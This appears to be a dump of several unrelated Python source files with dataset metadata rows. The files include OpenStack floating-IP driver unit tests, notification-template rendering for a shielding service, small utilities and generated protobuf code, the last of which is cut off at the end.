# BUG FIXED: the original loop tested `num[i] > 10 and num[i] > 40` (two
# lower bounds; the second comparison should have been an upper bound) and
# initialized `count` to 1 instead of 0.  Those two bugs happened to print 4,
# matching the original "Output: 4" comment.  The corrected half-open test
# below (lo <= x < hi) follows the 40-80 template this script was copied
# from, and yields 3 for the sample input.


def count_in_range(nums, lo, hi):
    """Return how many elements x of nums satisfy lo <= x < hi.

    Generalizes the original hard-coded bounds; an empty list yields 0.
    """
    total = 0
    for x in nums:
        if lo <= x < hi:
            total += 1
    return total


num = [10, 20, 30, 40, 50, 40, 40, 60, 70]  # range: 10-40
# print() with a single argument works identically under Python 2 and 3.
print(count_in_range(num, 10, 40))
| 23.484848
| 76
| 0.402581
| 126
| 775
| 2.47619
| 0.190476
| 0.089744
| 0.076923
| 0.102564
| 0.849359
| 0.849359
| 0.849359
| 0.791667
| 0.714744
| 0.657051
| 0
| 0.18569
| 0.242581
| 775
| 32
| 77
| 24.21875
| 0.345826
| 0.735484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
38dd53f3d3c85d00e41321871c4bd3ae8cd9e2b4
| 74
|
py
|
Python
|
HW2/scripts/utils.py
|
UltronAI/Stochastic-Process
|
edbfe0eb2b62758e093306d18ba5a96415572be1
|
[
"MIT"
] | null | null | null |
HW2/scripts/utils.py
|
UltronAI/Stochastic-Process
|
edbfe0eb2b62758e093306d18ba5a96415572be1
|
[
"MIT"
] | null | null | null |
HW2/scripts/utils.py
|
UltronAI/Stochastic-Process
|
edbfe0eb2b62758e093306d18ba5a96415572be1
|
[
"MIT"
] | null | null | null |
import numpy as np
def mse(y_pred, y):
    """Mean squared error between predictions y_pred and targets y."""
    squared_error = (y - y_pred) ** 2
    return np.mean(squared_error)
| 14.8
| 33
| 0.648649
| 16
| 74
| 2.875
| 0.6875
| 0.217391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016667
| 0.189189
| 74
| 4
| 34
| 18.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
38e5678d4874768a9fa0f7f1d27950c976ffddc0
| 111
|
py
|
Python
|
pynumdiff/nnet/__init__.py
|
fossabot/PyNumDiff
|
dccad2ad7a875f2ecccb0db2bb6e2afa392916d1
|
[
"MIT"
] | null | null | null |
pynumdiff/nnet/__init__.py
|
fossabot/PyNumDiff
|
dccad2ad7a875f2ecccb0db2bb6e2afa392916d1
|
[
"MIT"
] | null | null | null |
pynumdiff/nnet/__init__.py
|
fossabot/PyNumDiff
|
dccad2ad7a875f2ecccb0db2bb6e2afa392916d1
|
[
"MIT"
] | null | null | null |
from pynumdiff.nnet.__nnet__ import adam as adam
from pynumdiff.nnet.__nnet__ import quasinewton as quasinewton
| 55.5
| 62
| 0.864865
| 16
| 111
| 5.5
| 0.4375
| 0.295455
| 0.386364
| 0.477273
| 0.613636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099099
| 111
| 2
| 62
| 55.5
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
38e6861c9f7806a7f307034ecf8801bb12087614
| 14,973
|
py
|
Python
|
kuryr_kubernetes/tests/unit/controller/drivers/test_lb_public_ip.py
|
ragilsetian/kuryr-k8s
|
922baf3fcd68517427da861939fcf6832708fc4f
|
[
"Apache-2.0"
] | null | null | null |
kuryr_kubernetes/tests/unit/controller/drivers/test_lb_public_ip.py
|
ragilsetian/kuryr-k8s
|
922baf3fcd68517427da861939fcf6832708fc4f
|
[
"Apache-2.0"
] | null | null | null |
kuryr_kubernetes/tests/unit/controller/drivers/test_lb_public_ip.py
|
ragilsetian/kuryr-k8s
|
922baf3fcd68517427da861939fcf6832708fc4f
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2017 RedHat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import munch
from openstack import exceptions as os_exc
from unittest import mock
from kuryr_kubernetes.controller.drivers import lb_public_ip\
as d_lb_public_ip
from kuryr_kubernetes.controller.drivers import public_ip
from kuryr_kubernetes.objects import lbaas as obj_lbaas
from kuryr_kubernetes.tests import base as test_base
from kuryr_kubernetes.tests.unit import kuryr_fixtures as k_fix
from oslo_config import cfg
class TestFloatingIpServicePubIPDriverDriver(test_base.TestCase):
    """Tests for the FloatingIpServicePubIPDriver in lb_public_ip.

    Each test builds a mock driver (spec'd on the real class) with a real
    FipPubIpDriver attached, and mocks the OpenStack network client via the
    MockNetworkClient fixture.
    """

    def test_acquire_service_pub_ip_info_clusterip(self):
        """ClusterIP services must not be assigned a public IP."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        project_id = mock.sentinel.project_id
        cur_service_pub_ip_info = None
        service = {'spec': {'type': 'ClusterIP'}}
        # NOTE(review): this test passes a service dict where the sibling
        # tests pass (spec_type, spec_lb_ip, project_id) — confirm against
        # the real acquire_service_pub_ip_info signature.
        result = cls.acquire_service_pub_ip_info(m_driver, service, project_id,
                                                 cur_service_pub_ip_info)
        self.assertIsNone(result)

    def test_acquire_service_pub_ip_info_usr_specified_ip(self):
        """A free, user-specified FIP is returned with alloc_method 'user'."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        # port_id=None means the floating IP is not attached to anything.
        fip = munch.Munch({'floating_ip_address': '1.2.3.4',
                           'port_id': None,
                           'id': 'a2a62ea7-e3bf-40df-8c09-aa0c29876a6b'})
        os_net.ips.return_value = (ip for ip in [fip])
        project_id = mock.sentinel.project_id
        spec_type = 'LoadBalancer'
        spec_lb_ip = '1.2.3.4'
        expected_resp = (obj_lbaas
                         .LBaaSPubIp(ip_id=fip.id,
                                     ip_addr=fip.floating_ip_address,
                                     alloc_method='user'))
        result = cls.acquire_service_pub_ip_info(m_driver, spec_type,
                                                 spec_lb_ip, project_id)
        self.assertEqual(result, expected_resp)

    def test_acquire_service_pub_ip_info_user_specified_non_exist_fip(self):
        """Requesting an address that no FIP has yields None."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        # Only 1.2.3.5 exists; the service asks for 1.2.3.4.
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'port_id': None})
        os_net.ips.return_value = (ip for ip in [fip])
        project_id = mock.sentinel.project_id
        spec_type = 'LoadBalancer'
        spec_lb_ip = '1.2.3.4'
        result = cls.acquire_service_pub_ip_info(m_driver, spec_type,
                                                 spec_lb_ip, project_id)
        self.assertIsNone(result)

    def test_acquire_service_pub_ip_info_user_specified_occupied_fip(self):
        """Requesting a FIP that is already bound to a port yields None."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        # A non-None port_id marks the floating IP as occupied.
        fip = munch.Munch({'floating_ip_address': '1.2.3.4',
                           'port_id': 'ec29d641-fec4-4f67-928a-124a76b3a8e6'})
        os_net.ips.return_value = (ip for ip in [fip])
        project_id = mock.sentinel.project_id
        spec_type = 'LoadBalancer'
        spec_lb_ip = '1.2.3.4'
        result = cls.acquire_service_pub_ip_info(m_driver, spec_type,
                                                 spec_lb_ip, project_id)
        self.assertIsNone(result)

    @mock.patch('kuryr_kubernetes.config.CONF')
    def test_acquire_service_pub_ip_info_pool_net_not_defined(self, m_cfg):
        """Pool allocation without external_svc_net raises RequiredOptError."""
        # Uses a real driver instance (not a Mock) so the config check runs.
        driver = d_lb_public_ip.FloatingIpServicePubIPDriver()
        public_net = ''
        m_cfg.neutron_defaults.external_svc_net = public_net
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        os_net.ips.return_value = (ip for ip in [])
        project_id = mock.sentinel.project_id
        spec_type = 'LoadBalancer'
        spec_lb_ip = None
        self.assertRaises(cfg.RequiredOptError,
                          driver.acquire_service_pub_ip_info,
                          spec_type, spec_lb_ip, project_id)

    @mock.patch('kuryr_kubernetes.config.CONF')
    def test_acquire_service_pub_ip_info_pool_subnet_is_none(self, m_cfg):
        """Pool allocation works with external_svc_net but no subnet."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        public_net = mock.sentinel.public_subnet
        m_cfg.neutron_defaults.external_svc_net = public_net
        m_cfg.neutron_defaults.external_svc_subnet = None
        os_net.get_subnet.return_value = munch.Munch(
            {'network_id': 'ec29d641-fec4-4f67-928a-124a76b3a8e6'})
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
        os_net.create_ip.return_value = fip
        project_id = mock.sentinel.project_id
        spec_type = 'LoadBalancer'
        spec_lb_ip = None
        expected_resp = obj_lbaas.LBaaSPubIp(ip_id=fip.id,
                                             ip_addr=fip.floating_ip_address,
                                             alloc_method='pool')
        result = cls.acquire_service_pub_ip_info(m_driver, spec_type,
                                                 spec_lb_ip, project_id)
        self.assertEqual(result, expected_resp)

    @mock.patch('kuryr_kubernetes.config.CONF')
    def test_acquire_service_pub_ip_info_alloc_from_pool(self, m_cfg):
        """With a configured subnet, a new FIP is allocated from the pool."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        m_cfg.neutron_defaults.external_svc_subnet = (mock.sentinel
                                                      .external_svc_subnet)
        os_net.get_subnet.return_value = munch.Munch(
            {'network_id': 'ec29d641-fec4-4f67-928a-124a76b3a8e6'})
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
        os_net.create_ip.return_value = fip
        project_id = mock.sentinel.project_id
        spec_type = 'LoadBalancer'
        spec_lb_ip = None
        expected_resp = obj_lbaas.LBaaSPubIp(ip_id=fip.id,
                                             ip_addr=fip.floating_ip_address,
                                             alloc_method='pool')
        result = cls.acquire_service_pub_ip_info(m_driver, spec_type,
                                                 spec_lb_ip, project_id)
        self.assertEqual(result, expected_resp)

    def test_release_pub_ip_empty_lb_ip_info(self):
        """Releasing with no pub-IP info succeeds as a no-op."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        service_pub_ip_info = None
        rc = cls.release_pub_ip(m_driver, service_pub_ip_info)
        self.assertIs(rc, True)

    def test_release_pub_ip_alloc_method_non_pool(self):
        """An unrecognized alloc_method is not released but still succeeds."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
        service_pub_ip_info = (obj_lbaas
                               .LBaaSPubIp(ip_id=fip.id,
                                           ip_addr=fip.floating_ip_address,
                                           alloc_method='kk'))
        rc = cls.release_pub_ip(m_driver, service_pub_ip_info)
        self.assertIs(rc, True)

    def test_release_pub_ip_alloc_method_user(self):
        """A user-supplied FIP is never deleted on release."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
        service_pub_ip_info = (obj_lbaas
                               .LBaaSPubIp(ip_id=fip.id,
                                           ip_addr=fip.floating_ip_address,
                                           alloc_method='user'))
        rc = cls.release_pub_ip(m_driver, service_pub_ip_info)
        self.assertIs(rc, True)

    def test_release_pub_ip_alloc_method_pool_neutron_exception(self):
        """An SDK error while deleting a pool FIP makes release return False."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        os_net.delete_ip.side_effect = os_exc.SDKException
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
        service_pub_ip_info = (obj_lbaas
                               .LBaaSPubIp(ip_id=fip.id,
                                           ip_addr=fip.floating_ip_address,
                                           alloc_method='pool'))
        rc = cls.release_pub_ip(m_driver, service_pub_ip_info)
        self.assertIs(rc, False)

    def test_release_pub_ip_alloc_method_pool_neutron_succeeded(self):
        """A pool FIP is successfully deleted on release."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        self.useFixture(k_fix.MockNetworkClient()).client
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
        service_pub_ip_info = (obj_lbaas
                               .LBaaSPubIp(ip_id=fip.id,
                                           ip_addr=fip.floating_ip_address,
                                           alloc_method='pool'))
        rc = cls.release_pub_ip(m_driver, service_pub_ip_info)
        self.assertIs(rc, True)

    def test_associate_pub_ip_empty_params(self):
        """Associating with no pub-IP info and no port is a no-op."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        os_net.update_floatingip.return_value = None
        service_pub_ip_info = None
        vip_port_id = None
        result = cls.associate_pub_ip(m_driver, service_pub_ip_info,
                                      vip_port_id)
        self.assertIsNone(result)

    def test_associate_lb_fip_id_not_exist(self):
        """Associating with a falsy FIP id (0) is a no-op."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        os_net.update_floatingip.return_value = None
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
        service_pub_ip_info = (obj_lbaas
                               .LBaaSPubIp(ip_id=0,
                                           ip_addr=fip.floating_ip_address,
                                           alloc_method='pool'))
        vip_port_id = 'ec29d641-fec4-4f67-928a-124a76b3a777'
        result = cls.associate_pub_ip(m_driver, service_pub_ip_info,
                                      vip_port_id)
        self.assertIsNone(result)

    def test_associate_lb_fip_id_not_exist_neutron_exception(self):
        """An SDK error while associating is propagated."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        os_net.update_ip.side_effect = os_exc.SDKException
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
        service_pub_ip_info = (obj_lbaas
                               .LBaaSPubIp(ip_id=fip.id,
                                           ip_addr=fip.floating_ip_address,
                                           alloc_method='pool'))
        vip_port_id = 'ec29d641-fec4-4f67-928a-124a76b3a777'
        self.assertRaises(os_exc.SDKException, cls.associate_pub_ip,
                          m_driver, service_pub_ip_info, vip_port_id)

    def test_disassociate_pub_ip_empty_param(self):
        """Disassociating with no pub-IP info is a no-op."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        self.useFixture(k_fix.MockNetworkClient()).client
        service_pub_ip_info = None
        result = cls.disassociate_pub_ip(m_driver, service_pub_ip_info)
        self.assertIsNone(result)

    def test_disassociate_pub_ip_fip_id_not_exist(self):
        """Disassociating with a falsy FIP id (0) is a no-op."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        os_net.update_floatingip.return_value = None
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
        service_pub_ip_info = (obj_lbaas
                               .LBaaSPubIp(ip_id=0,
                                           ip_addr=fip.floating_ip_address,
                                           alloc_method='pool'))
        result = cls.disassociate_pub_ip(m_driver, service_pub_ip_info)
        self.assertIsNone(result)

    def test_disassociate_pub_ip_neutron_exception(self):
        """An SDK error while disassociating is propagated."""
        cls = d_lb_public_ip.FloatingIpServicePubIPDriver
        m_driver = mock.Mock(spec=cls)
        m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        os_net.update_ip.side_effect = os_exc.SDKException
        fip = munch.Munch({'floating_ip_address': '1.2.3.5',
                           'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
        service_pub_ip_info = (obj_lbaas
                               .LBaaSPubIp(ip_id=fip.id,
                                           ip_addr=fip.floating_ip_address,
                                           alloc_method='pool'))
        self.assertRaises(os_exc.SDKException, cls.disassociate_pub_ip,
                          m_driver, service_pub_ip_info)
| 44.695522
| 79
| 0.618714
| 1,835
| 14,973
| 4.671935
| 0.107357
| 0.040826
| 0.05319
| 0.07092
| 0.869591
| 0.846611
| 0.81815
| 0.80217
| 0.793305
| 0.763443
| 0
| 0.038257
| 0.296467
| 14,973
| 334
| 80
| 44.829341
| 0.775584
| 0.040206
| 0
| 0.782101
| 0
| 0
| 0.084494
| 0.045974
| 0
| 0
| 0
| 0
| 0.070039
| 1
| 0.070039
| false
| 0
| 0.035019
| 0
| 0.108949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a4e084b2645a119068723676c33b0e1cab5d700
| 3,231
|
py
|
Python
|
vulnerable_people_form/integrations/notification_content.py
|
StephenGill/govuk-shielded-vulnerable-people-service
|
fbb74de933ffd3080c84611de067ba336bfa5518
|
[
"MIT"
] | null | null | null |
vulnerable_people_form/integrations/notification_content.py
|
StephenGill/govuk-shielded-vulnerable-people-service
|
fbb74de933ffd3080c84611de067ba336bfa5518
|
[
"MIT"
] | null | null | null |
vulnerable_people_form/integrations/notification_content.py
|
StephenGill/govuk-shielded-vulnerable-people-service
|
fbb74de933ffd3080c84611de067ba336bfa5518
|
[
"MIT"
] | null | null | null |
from flask import render_template
from vulnerable_people_form.form_pages.shared.session import form_answers, is_nhs_login_user
def _render_spl_content(template_name, extra_fields):
    """Render a notification template with the fields every template shares.

    All SPL notification templates receive the applicant's first/last name
    and the shopping-support answer; ``extra_fields`` supplies the
    template-specific values.
    """
    name = form_answers()["name"]
    return render_template(
        template_name,
        first_name=name["first_name"],
        last_name=name["last_name"],
        has_someone_to_shop=form_answers().get(
            "do_you_have_someone_to_go_shopping_for_you"),
        **extra_fields
    )


def _spl_no_match_fields(reference_number):
    """Fields shared by every 'no match' notification template."""
    return {
        "reference_number": reference_number,
        "told_to_shield": form_answers()["nhs_letter"],
    }


def _spl_match_fields(reference_number):
    """Fields shared by every 'match' notification template."""
    return {
        "reference_number": reference_number,
        "wants_supermarket_deliveries": form_answers().get(
            "priority_supermarket_deliveries"),
        "wants_social_care": form_answers().get("basic_care_needs"),
        "has_set_up_account": is_nhs_login_user(),
    }


def create_spl_no_match_email_content(reference_number):
    """Email body for an applicant not matched on the shielded patient list."""
    return _render_spl_content(
        "_spl_no_match_email_template.md",
        _spl_no_match_fields(reference_number))


def create_spl_no_match_sms_content(reference_number):
    """SMS body for an applicant not matched on the shielded patient list.

    Newlines are stripped because the SMS channel expects a single line.
    """
    return _render_spl_content(
        "_spl_no_match_sms_template.txt",
        _spl_no_match_fields(reference_number)).replace("\n", "")


def create_spl_no_match_letter_content(reference_number):
    """Letter body for an applicant not matched on the shielded patient list."""
    return _render_spl_content(
        "_spl_no_match_letter_template.md",
        _spl_no_match_fields(reference_number))


def create_spl_match_email_content(reference_number):
    """Email body for an applicant matched on the shielded patient list."""
    return _render_spl_content(
        "_spl_match_email_template.md",
        _spl_match_fields(reference_number))


def create_spl_match_sms_content(reference_number):
    """SMS body for an applicant matched on the shielded patient list.

    Newlines are stripped because the SMS channel expects a single line.
    """
    return _render_spl_content(
        "_spl_match_sms_template.txt",
        _spl_match_fields(reference_number)).replace("\n", "")


def create_spl_match_letter_content(reference_number):
    """Letter body for an applicant matched on the shielded patient list."""
    return _render_spl_content(
        "_spl_match_letter_template.md",
        _spl_match_fields(reference_number))
| 42.513158
| 93
| 0.735067
| 429
| 3,231
| 4.944056
| 0.137529
| 0.145215
| 0.084866
| 0.107496
| 0.956624
| 0.934936
| 0.934936
| 0.91702
| 0.91702
| 0.759547
| 0
| 0
| 0.148561
| 3,231
| 75
| 94
| 43.08
| 0.770992
| 0
| 0
| 0.709677
| 0
| 0
| 0.237078
| 0.16156
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.032258
| 0.096774
| 0.225806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a6652d3cdead536a3ffa2f8dca821498413afc9
| 157
|
py
|
Python
|
src/nlp_datasets/text_to_speech/__init__.py
|
TeaKatz/NLP_Datasets
|
6eeacd0d120ce8d7d1e3da2b40af94006ee1cdf6
|
[
"MIT"
] | null | null | null |
src/nlp_datasets/text_to_speech/__init__.py
|
TeaKatz/NLP_Datasets
|
6eeacd0d120ce8d7d1e3da2b40af94006ee1cdf6
|
[
"MIT"
] | null | null | null |
src/nlp_datasets/text_to_speech/__init__.py
|
TeaKatz/NLP_Datasets
|
6eeacd0d120ce8d7d1e3da2b40af94006ee1cdf6
|
[
"MIT"
] | null | null | null |
from .WordAudioDataset import WordAudioDataset
from .WordAudioDataset import WordAudioWithNegativeSamples
from .Word2SpeechDataset import Word2SpeechDataset
| 39.25
| 58
| 0.904459
| 12
| 157
| 11.833333
| 0.416667
| 0.28169
| 0.366197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013793
| 0.076433
| 157
| 4
| 59
| 39.25
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2a78ede36657404156938ecd2bbfe301f4f38fb9
| 61
|
py
|
Python
|
dql/__init__.py
|
E-G-C/dql
|
fb208cf3033aacc5347a1dc2ebfa9fd5cc7945e0
|
[
"MIT"
] | 3
|
2019-08-26T02:44:11.000Z
|
2022-03-09T21:57:18.000Z
|
dql/__init__.py
|
E-G-C/dql
|
fb208cf3033aacc5347a1dc2ebfa9fd5cc7945e0
|
[
"MIT"
] | 1
|
2019-09-09T15:30:20.000Z
|
2019-11-25T20:54:38.000Z
|
dql/__init__.py
|
E-G-C/dql
|
fb208cf3033aacc5347a1dc2ebfa9fd5cc7945e0
|
[
"MIT"
] | null | null | null |
from .dictQL import DictQL
from .dictQL import DictQL as Dql
| 20.333333
| 33
| 0.803279
| 10
| 61
| 4.9
| 0.5
| 0.408163
| 0.653061
| 0.897959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163934
| 61
| 2
| 34
| 30.5
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
aa69789160f789f70a1dbf0b63d581f712e03079
| 16,312
|
py
|
Python
|
src/syft/proto/grid/messages/transfer_messages_pb2.py
|
dnabanita7/PySyft
|
ce2510e65f5bad382e88806bcde30fa38c3c76c4
|
[
"Apache-2.0"
] | 2
|
2020-10-19T19:18:46.000Z
|
2020-12-07T12:06:30.000Z
|
packages/syft/src/syft/proto/grid/messages/transfer_messages_pb2.py
|
Metrix1010/PySyft
|
6477f64b63dc285059c3766deab3993653cead2e
|
[
"Apache-2.0"
] | 5
|
2020-09-11T05:47:12.000Z
|
2020-10-13T08:36:17.000Z
|
packages/syft/src/syft/proto/grid/messages/transfer_messages_pb2.py
|
Metrix1010/PySyft
|
6477f64b63dc285059c3766deab3993653cead2e
|
[
"Apache-2.0"
] | 1
|
2021-08-19T12:23:01.000Z
|
2021-08-19T12:23:01.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: proto/grid/messages/transfer_messages.proto
"""Generated protocol buffer code."""
# third party
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database

# @@protoc_insertion_point(imports)

# Default symbol database; the generated message classes below are
# registered into it so they can be looked up by full name.
_sym_db = _symbol_database.Default()

# syft absolute
from syft.proto.core.common import (
    common_object_pb2 as proto_dot_core_dot_common_dot_common__object__pb2,
)
from syft.proto.core.io import address_pb2 as proto_dot_core_dot_io_dot_address__pb2

# File descriptor for transfer_messages.proto. serialized_pb is the
# compiled FileDescriptorProto bytes emitted by protoc — regenerate from
# the .proto file rather than editing by hand.
DESCRIPTOR = _descriptor.FileDescriptor(
    name="proto/grid/messages/transfer_messages.proto",
    package="syft.grid.messages",
    syntax="proto3",
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
    serialized_pb=b'\n+proto/grid/messages/transfer_messages.proto\x12\x12syft.grid.messages\x1a%proto/core/common/common_object.proto\x1a\x1bproto/core/io/address.proto"\x9c\x01\n\x11LoadObjectMessage\x12%\n\x06msg_id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12&\n\x07\x61\x64\x64ress\x18\x02 \x01(\x0b\x32\x15.syft.core.io.Address\x12\x0f\n\x07\x63ontent\x18\x03 \x01(\t\x12\'\n\x08reply_to\x18\x04 \x01(\x0b\x32\x15.syft.core.io.Address"\x89\x01\n\x12LoadObjectResponse\x12%\n\x06msg_id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12\x13\n\x0bstatus_code\x18\x02 \x01(\x05\x12\x0f\n\x07\x63ontent\x18\x03 \x01(\t\x12&\n\x07\x61\x64\x64ress\x18\x04 \x01(\x0b\x32\x15.syft.core.io.Address"s\n\x11SaveObjectMessage\x12%\n\x06msg_id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12&\n\x07\x61\x64\x64ress\x18\x02 \x01(\x0b\x32\x15.syft.core.io.Address\x12\x0f\n\x07\x63ontent\x18\x03 \x01(\t"\x89\x01\n\x12SaveObjectResponse\x12%\n\x06msg_id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12\x13\n\x0bstatus_code\x18\x02 \x01(\x05\x12\x0f\n\x07\x63ontent\x18\x03 